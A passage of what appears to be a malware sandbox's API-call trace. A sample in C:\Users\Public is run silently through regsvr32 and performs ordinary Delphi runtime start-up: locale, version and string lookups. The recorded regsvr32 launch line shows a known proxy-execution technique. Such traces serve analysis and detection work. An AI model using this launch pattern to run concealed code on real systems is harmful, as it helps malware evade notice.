(lpModuleName="kernel32.dll") returned 0x77780000 [0260.513] GetProcAddress (hModule=0x77780000, lpProcName="SetThreadPreferredUILanguages") returned 0x777be627 [0260.514] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77780000 [0260.514] GetProcAddress (hModule=0x77780000, lpProcName="GetThreadUILanguage") returned 0x777bae42 [0260.514] GetSystemInfo (in: lpSystemInfo=0x17e4ac | out: lpSystemInfo=0x17e4ac*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x1, dwNumberOfProcessors=0x1, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x2d07)) [0260.514] GetCommandLineW () returned="\"C:\\Windows\\System32\\regsvr32.exe\" /s \"C:\\Users\\Public\\N3Eg\\N3Eg2.51N3E\" #96" [0260.514] GetStartupInfoW (in: lpStartupInfo=0x17e488 | out: lpStartupInfo=0x17e488*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\System32\\regsvr32.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x200212, hStdError=0x1f80)) [0260.514] GetACP () returned 0x4e4 [0260.514] GetCurrentThreadId () returned 0x578 [0260.514] GetVersion () returned 0x1db10106 [0260.514] GetVersionExW (in: lpVersionInformation=0x17e3bc*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x77bbf879, dwMinorVersion=0x77bbf99a, dwBuildNumber=0x1b1ca8, dwPlatformId=0x17e422, szCSDVersion="\x17\x17Ⳑ\x1c\x17諸瞻烲瞻恔瞺閂痳￿￿%") | out: lpVersionInformation=0x17e3bc*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0260.514] GetModuleFileNameW (in: hModule=0x610000, lpFilename=0x17c278, nSize=0x20a | out: lpFilename="C:\\Users\\Public\\N3Eg\\N3Eg2.51N3E") returned 0x20 [0260.514] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x17c062, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\regsvr32.exe") returned 0x20 [0260.514] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x770000 [0260.515] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x17bfdc | out: phkResult=0x17bfdc*=0x0) returned 0x2 [0260.515] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x17bfdc | out: phkResult=0x17bfdc*=0x0) returned 0x2 [0260.515] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x17bfdc | out: phkResult=0x17bfdc*=0x0) returned 0x2 [0260.515] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x17bfdc | out: phkResult=0x17bfdc*=0x0) returned 0x2 [0260.515] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x17bfdc | out: phkResult=0x17bfdc*=0x0) returned 0x2 [0260.515] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x17bfdc | out: phkResult=0x17bfdc*=0x0) returned 0x2 [0260.515] GetUserDefaultUILanguage () returned 0x409 [0260.516] IsValidLocale (Locale=0x409, dwFlags=0x2) returned 1 [0260.516] GetThreadUILanguage () returned 0x170409 [0260.516] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x17bfb8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x17bfe0 | out: pulNumLanguages=0x17bfb8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x17bfe0) returned 1 [0260.516] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x17bfb8, pwszLanguagesBuffer=0x89a680, pcchLanguagesBuffer=0x17bfe0 | out: pulNumLanguages=0x17bfb8, pwszLanguagesBuffer=0x89a680, pcchLanguagesBuffer=0x17bfe0) returned 1 [0260.516] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\N3Eg\\N3Eg2.en-US", lpFindFileData=0x17bd88 | out: lpFindFileData=0x17bd88) returned 0xffffffff [0260.520] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\N3Eg\\N3Eg2.en", lpFindFileData=0x17bd88 | out: lpFindFileData=0x17bd88) returned 0xffffffff [0260.520] GetUserDefaultUILanguage () returned 0x409 [0260.520] GetLocaleInfoW (in: Locale=0x409, LCType=0x3, lpLCData=0x17bffc, cchData=4 | out: lpLCData="ENU") returned 4 [0260.520] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\N3Eg\\N3Eg2.ENU", lpFindFileData=0x17bd88 | out: lpFindFileData=0x17bd88) returned 0xffffffff [0260.520] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\N3Eg\\N3Eg2.EN", lpFindFileData=0x17bd88 | out: lpFindFileData=0x17bd88) returned 0xffffffff [0260.521] LoadStringW (in: hInstance=0x610000, uID=0xffc8, lpBuffer=0x17c4ac, cchBufferMax=4096 | out: lpBuffer="Method called on disposed object") returned 0x20 [0260.521] LoadStringW (in: hInstance=0x610000, uID=0xffc7, lpBuffer=0x17c4ac, cchBufferMax=4096 | out: lpBuffer="Feature not implemented") returned 0x17 [0260.521] LoadStringW (in: hInstance=0x610000, uID=0xffc6, lpBuffer=0x17c4ac, cchBufferMax=4096 | out: lpBuffer="Monitor support function not initialized") returned 0x28 [0260.521] LoadStringW (in: hInstance=0x610000, uID=0xffc5, lpBuffer=0x17c4ac, cchBufferMax=4096 | out: lpBuffer="Object lock not owned") returned 0x15 [0260.521] LoadStringW (in: hInstance=0x610000, uID=0xffc4, lpBuffer=0x17c4ac, cchBufferMax=4096 | out: lpBuffer="Exception in safecall method") returned 0x1c [0260.521] LoadStringW (in: hInstance=0x610000, uID=0xffc3, lpBuffer=0x17c4ac, cchBufferMax=4096 | out: lpBuffer="Interface not supported") returned 0x17 [0260.521] LoadStringW (in: hInstance=0x610000, uID=0xffc1, lpBuffer=0x17c4ac, cchBufferMax=4096 | out: lpBuffer="External exception %x") returned 0x15 [0260.521] LoadStringW (in: hInstance=0x610000, uID=0xffc2, lpBuffer=0x17c4ac, cchBufferMax=4096 | out: lpBuffer="Assertion failed") returned 0x10 [0260.521] LoadStringW (in: hInstance=0x610000, uID=0xffd0, lpBuffer=0x17c4ac, cchBufferMax=4096 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0260.521] LoadStringW (in: hInstance=0x610000, uID=0xffdd, lpBuffer=0x17c4ac, cchBufferMax=4096 | out: lpBuffer="Invalid argument") returned 0x10 [0260.521] LoadStringW (in: hInstance=0x610000, uID=0xffef, lpBuffer=0x17c4ac, cchBufferMax=4096 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0260.522] LoadStringW (in: hInstance=0x610000, uID=0xffec, lpBuffer=0x17c4ac, cchBufferMax=4096 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0260.522] LoadStringW (in: hInstance=0x610000, uID=0xffd3, lpBuffer=0x17c4ac, cchBufferMax=4096 | out: lpBuffer="Invalid variant operation") returned 0x19 [0260.522] LoadStringW (in: hInstance=0x610000, uID=0xffd2, lpBuffer=0x17c4ac, cchBufferMax=4096 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0260.522] LoadStringW (in: hInstance=0x610000, uID=0xffe5, lpBuffer=0x17c4ac, cchBufferMax=4096 | out: lpBuffer="Stack overflow") returned 0xe [0260.522] LoadStringW (in: hInstance=0x610000, uID=0xffe6, lpBuffer=0x17c4ac, cchBufferMax=4096 | out: lpBuffer="Control-C hit") returned 0xd [0260.522] LoadStringW (in: hInstance=0x610000, uID=0xffe7, lpBuffer=0x17c4ac, cchBufferMax=4096 | out: lpBuffer="Privileged instruction") returned 0x16 [0260.522] LoadStringW (in: hInstance=0x610000, uID=0xffe4, lpBuffer=0x17c4ac, cchBufferMax=4096 | out: lpBuffer="Access violation") returned 0x10 [0260.522] LoadStringW (in: hInstance=0x610000, uID=0xffe2, lpBuffer=0x17c4ac, cchBufferMax=4096 | out: lpBuffer="Invalid class typecast") returned 0x16 [0260.522] LoadStringW (in: hInstance=0x610000, uID=0xffe0, lpBuffer=0x17c4ac, cchBufferMax=4096 | out: lpBuffer="Floating point underflow") returned 0x18 [0260.522] LoadStringW (in: hInstance=0x610000, uID=0xffff, lpBuffer=0x17c4ac, cchBufferMax=4096 | out: lpBuffer="Floating point overflow") returned 0x17 [0260.522] LoadStringW (in: hInstance=0x610000, uID=0xfffe, lpBuffer=0x17c4ac, cchBufferMax=4096 | out: lpBuffer="Floating point division by zero") returned 0x1f [0260.522] LoadStringW (in: hInstance=0x610000, uID=0xfffd, lpBuffer=0x17c4ac, cchBufferMax=4096 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0260.522] LoadStringW (in: hInstance=0x610000, uID=0xfffc, lpBuffer=0x17c4ac, cchBufferMax=4096 | out: lpBuffer="Integer overflow") returned 0x10 [0260.522] LoadStringW (in: hInstance=0x610000, uID=0xfffb, lpBuffer=0x17c4ac, cchBufferMax=4096 | out: lpBuffer="Range check error") returned 0x11 [0260.522] LoadStringW (in: hInstance=0x610000, uID=0xfffa, lpBuffer=0x17c4ac, cchBufferMax=4096 | out: lpBuffer="Division by zero") returned 0x10 [0260.522] LoadStringW (in: hInstance=0x610000, uID=0xfff3, lpBuffer=0x17c4a4, cchBufferMax=4096 | out: lpBuffer="Out of memory") returned 0xd [0260.522] LoadStringW (in: hInstance=0x610000, uID=0xffe1, lpBuffer=0x17c4a4, cchBufferMax=4096 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0260.522] GetVersionExW (in: lpVersionInformation=0x17e3b8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x17e3b8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0260.522] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x77780000 [0260.523] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x1c4d18 [0260.523] GetProcAddress (hModule=0x77780000, lpProcName="GetNativeSystemInfo") returned 0x777bbe77 [0260.523] GetNativeSystemInfo (in: lpSystemInfo=0x17e394 | out: lpSystemInfo=0x17e394*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x1, dwNumberOfProcessors=0x1, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x2d07)) [0260.523] LoadStringW (in: hInstance=0x610000, uID=0xff6b, lpBuffer=0x17c388, cchBufferMax=4096 | out: lpBuffer="Windows") returned 0x7 [0260.523] LoadStringW (in: hInstance=0x610000, uID=0xff6e, lpBuffer=0x17c388, cchBufferMax=4096 | out: lpBuffer="Windows 7") returned 0x9 [0260.523] LoadStringW (in: hInstance=0x610000, uID=0xfff9, lpBuffer=0x17c49c, cchBufferMax=4096 | out: lpBuffer="Invalid numeric input") returned 0x15 [0260.523] LoadStringW (in: hInstance=0x610000, uID=0xfff8, lpBuffer=0x17c49c, cchBufferMax=4096 | out: lpBuffer="Disk full") returned 0x9 [0260.523] LoadStringW (in: hInstance=0x610000, uID=0xfff7, lpBuffer=0x17c49c, cchBufferMax=4096 | out: lpBuffer="Read beyond end of file") returned 0x17 [0260.523] LoadStringW (in: hInstance=0x610000, uID=0xfff6, lpBuffer=0x17c49c, cchBufferMax=4096 | out: lpBuffer="File access denied") returned 0x12 [0260.523] LoadStringW (in: hInstance=0x610000, uID=0xfff5, lpBuffer=0x17c49c, cchBufferMax=4096 | out: lpBuffer="Too many open files") returned 0x13 [0260.523] LoadStringW (in: hInstance=0x610000, uID=0xff84, lpBuffer=0x17c49c, cchBufferMax=4096 | out: lpBuffer="Invalid file name - %s") returned 0x16 [0260.523] LoadStringW (in: hInstance=0x610000, uID=0xff78, lpBuffer=0x17c49c, cchBufferMax=4096 | out: lpBuffer="The specified file was not found") returned 0x20 [0260.523] GetVersionExW (in: lpVersionInformation=0x17e3ac*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x10000, dwMinorVersion=0x2d070006, dwBuildNumber=0x11c, dwPlatformId=0x6, szCSDVersion="\x01") | out: lpVersionInformation=0x17e3ac*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0260.523] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77780000 [0260.523] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0260.524] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x8680dc, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDiskFreeSpaceExW", lpUsedDefaultChar=0x0) returned 19 [0260.524] GetProcAddress (hModule=0x77780000, lpProcName="GetDiskFreeSpaceExW") returned 0x777bde40 [0260.524] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x17e282, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\regsvr32.exe") returned 0x20 [0260.524] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x17e490 | out: phkResult=0x17e490*=0x0) returned 0x2 [0260.524] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x17e490 | out: phkResult=0x17e490*=0x0) returned 0x2 [0260.524] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x17e490 | out: phkResult=0x17e490*=0x0) returned 0x2 [0260.524] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x17e490 | out: phkResult=0x17e490*=0x0) returned 0x2 [0260.524] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x17e490 | out: phkResult=0x17e490*=0x0) returned 0x2 [0260.524] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x17e490 | out: phkResult=0x17e490*=0x0) returned 0x2 [0260.524] GetThreadLocale () returned 0x409 [0260.524] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x17e3d0 | out: lpCPInfo=0x17e3d0) returned 1 [0260.524] GetThreadLocale () returned 0x409 [0260.524] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x17e1c4, cchData=256 | out: lpLCData="2") returned 2 [0260.526] GetThreadLocale () returned 0x409 [0260.526] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0260.526] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x17e110, cchData=256 | out: lpLCData="Sun") returned 4 [0260.526] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x17e110, cchData=256 | out: lpLCData="Sunday") returned 7 [0260.526] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x17e110, cchData=256 | out: lpLCData="Mon") returned 4 [0260.526] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x17e110, cchData=256 | out: lpLCData="Monday") returned 7 [0260.526] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x17e110, cchData=256 | out: lpLCData="Tue") returned 4 [0260.527] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x17e110, cchData=256 | out: lpLCData="Tuesday") returned 8 [0260.527] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x17e110, cchData=256 | out: lpLCData="Wed") returned 4 [0260.527] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x17e110, cchData=256 | out: lpLCData="Wednesday") returned 10 [0260.527] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x17e110, cchData=256 | out: lpLCData="Thu") returned 4 [0260.527] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x17e110, cchData=256 | out: lpLCData="Thursday") returned 9 [0260.527] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x17e110, cchData=256 | out: lpLCData="Fri") returned 4 [0260.527] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x17e110, cchData=256 | out: lpLCData="Friday") returned 7 [0260.527] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x17e110, cchData=256 | out: lpLCData="Sat") returned 4 [0260.527] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x17e110, cchData=256 | out: lpLCData="Saturday") returned 9 [0260.527] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x17e114, cchData=256 | out: lpLCData="Jan") returned 4 [0260.527] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x17e114, cchData=256 | out: lpLCData="January") returned 8 [0260.527] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x17e114, cchData=256 | out: lpLCData="Feb") returned 4 [0260.527] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x17e114, cchData=256 | out: lpLCData="February") returned 9 [0260.527] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x17e114, cchData=256 | out: lpLCData="Mar") returned 4 [0260.527] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x17e114, cchData=256 | out: lpLCData="March") returned 6 [0260.527] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x17e114, cchData=256 | out: lpLCData="Apr") returned 4 [0260.527] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x17e114, cchData=256 | out: lpLCData="April") returned 6 [0260.527] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x17e114, cchData=256 | out: lpLCData="May") returned 4 [0260.527] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x17e114, cchData=256 | out: lpLCData="May") returned 4 [0260.527] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x17e114, cchData=256 | out: lpLCData="Jun") returned 4 [0260.527] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x17e114, cchData=256 | out: lpLCData="June") returned 5 [0260.527] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x17e114, cchData=256 | out: lpLCData="Jul") returned 4 [0260.527] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x17e114, cchData=256 | out: lpLCData="July") returned 5 [0260.527] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x17e114, cchData=256 | out: lpLCData="Aug") returned 4 [0260.527] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x17e114, cchData=256 | out: lpLCData="August") returned 7 [0260.527] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x17e114, cchData=256 | out: lpLCData="Sep") returned 4 [0260.527] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x17e114, cchData=256 | out: lpLCData="September") returned 10 [0260.527] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x17e114, cchData=256 | out: lpLCData="Oct") returned 4 [0260.527] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x17e114, cchData=256 | out: lpLCData="October") returned 8 [0260.527] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x17e114, cchData=256 | out: lpLCData="Nov") returned 4 [0260.528] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x17e114, cchData=256 | out: lpLCData="November") returned 9 [0260.528] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x17e114, cchData=256 | out: lpLCData="Dec") returned 4 [0260.528] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x17e114, cchData=256 | out: lpLCData="December") returned 9 [0260.528] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x17e164, cchData=256 | out: lpLCData="$") returned 2 [0260.528] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x17e164, cchData=256 | out: lpLCData="0") returned 2 [0260.528] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x17e164, cchData=256 | out: lpLCData="0") returned 2 [0260.528] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x17e35c, cchData=2 | out: lpLCData=",") returned 2 [0260.528] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x17e35c, cchData=2 | out: lpLCData=".") returned 2 [0260.528] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x17e164, cchData=256 | out: lpLCData="2") returned 2 [0260.528] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x17e35c, cchData=2 | out: lpLCData="/") returned 2 [0260.528] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x17e11c, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0260.528] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x17e11c, cchData=256 | out: lpLCData="1") returned 2 [0260.528] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x17e11c, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0260.528] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x17e11c, cchData=256 | out: lpLCData="1") returned 2 [0260.528] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x17e35c, cchData=2 | out: lpLCData=":") returned 2 [0260.528] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x17e164, cchData=256 | out: lpLCData="AM") returned 3 [0260.528] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x17e164, cchData=256 | out: lpLCData="PM") returned 3 [0260.528] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x17e164, cchData=256 | out: lpLCData="0") returned 2 [0260.528] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x17e164, cchData=256 | out: lpLCData="0") returned 2 [0260.528] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x17e164, cchData=256 | out: lpLCData="0") returned 2 [0260.528] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x17e35c, cchData=2 | out: lpLCData=",") returned 2 [0260.528] GetModuleHandleW (lpModuleName="oleaut32.dll") returned 0x77a00000 [0260.529] GetProcAddress (hModule=0x77a00000, lpProcName="VariantChangeTypeEx") returned 0x77a04c28 [0260.529] GetProcAddress (hModule=0x77a00000, lpProcName="VarNeg") returned 0x77a7c802 [0260.529] GetProcAddress (hModule=0x77a00000, lpProcName="VarNot") returned 0x77a7ec66 [0260.529] GetProcAddress (hModule=0x77a00000, lpProcName="VarAdd") returned 0x77a25934 [0260.529] GetProcAddress (hModule=0x77a00000, lpProcName="VarSub") returned 0x77a7d332 [0260.529] GetProcAddress (hModule=0x77a00000, lpProcName="VarMul") returned 0x77a7dbd4 [0260.529] GetProcAddress (hModule=0x77a00000, lpProcName="VarDiv") returned 0x77a7e405 [0260.529] GetProcAddress (hModule=0x77a00000, lpProcName="VarIdiv") returned 0x77a7f00a [0260.529] GetProcAddress (hModule=0x77a00000, lpProcName="VarMod") returned 0x77a7f15e [0260.529] GetProcAddress (hModule=0x77a00000, lpProcName="VarAnd") returned 0x77a25a98 [0260.529] GetProcAddress (hModule=0x77a00000, lpProcName="VarOr") returned 0x77a7ecfa [0260.529] GetProcAddress (hModule=0x77a00000, lpProcName="VarXor") returned 0x77a7ee2e [0260.530] GetProcAddress (hModule=0x77a00000, lpProcName="VarCmp") returned 0x77a1b0dc [0260.530] GetProcAddress (hModule=0x77a00000, lpProcName="VarI4FromStr") returned 0x77a16fab [0260.530] GetProcAddress (hModule=0x77a00000, lpProcName="VarR4FromStr") returned 0x77a201a0 [0260.530] GetProcAddress (hModule=0x77a00000, lpProcName="VarR8FromStr") returned 0x77a1699e [0260.530] GetProcAddress (hModule=0x77a00000, lpProcName="VarDateFromStr") returned 0x77a26ba7 [0260.530] GetProcAddress (hModule=0x77a00000, lpProcName="VarCyFromStr") returned 0x77a46c12 [0260.530] GetProcAddress (hModule=0x77a00000, lpProcName="VarBoolFromStr") returned 0x77a1dbd1 [0260.530] GetProcAddress (hModule=0x77a00000, lpProcName="VarBstrFromCy") returned 0x77a27fdc [0260.530] GetProcAddress (hModule=0x77a00000, lpProcName="VarBstrFromDate") returned 0x77a17a2a [0260.530] GetProcAddress (hModule=0x77a00000, lpProcName="VarBstrFromBool") returned 0x77a20355 [0260.530] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77780000 [0260.530] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0260.530] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x86f45c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InitializeConditionVariable", lpUsedDefaultChar=0x0) returned 27 [0260.531] GetProcAddress (hModule=0x77780000, lpProcName="InitializeConditionVariable") returned 0x77bb9981 [0260.531] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0260.531] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x868244, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeConditionVariable", lpUsedDefaultChar=0x0) returned 21 [0260.531] GetProcAddress (hModule=0x77780000, lpProcName="WakeConditionVariable") returned 0x77c05a7b [0260.531] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0260.531] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x86f45c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeAllConditionVariable", lpUsedDefaultChar=0x0) returned 24 [0260.531] GetProcAddress (hModule=0x77780000, lpProcName="WakeAllConditionVariable") returned 0x77b845a5 [0260.531] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0260.531] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x86f45c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SleepConditionVariableCS", lpUsedDefaultChar=0x0) returned 24 [0260.531] GetProcAddress (hModule=0x77780000, lpProcName="SleepConditionVariableCS") returned 0x777b18be [0260.531] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xa8 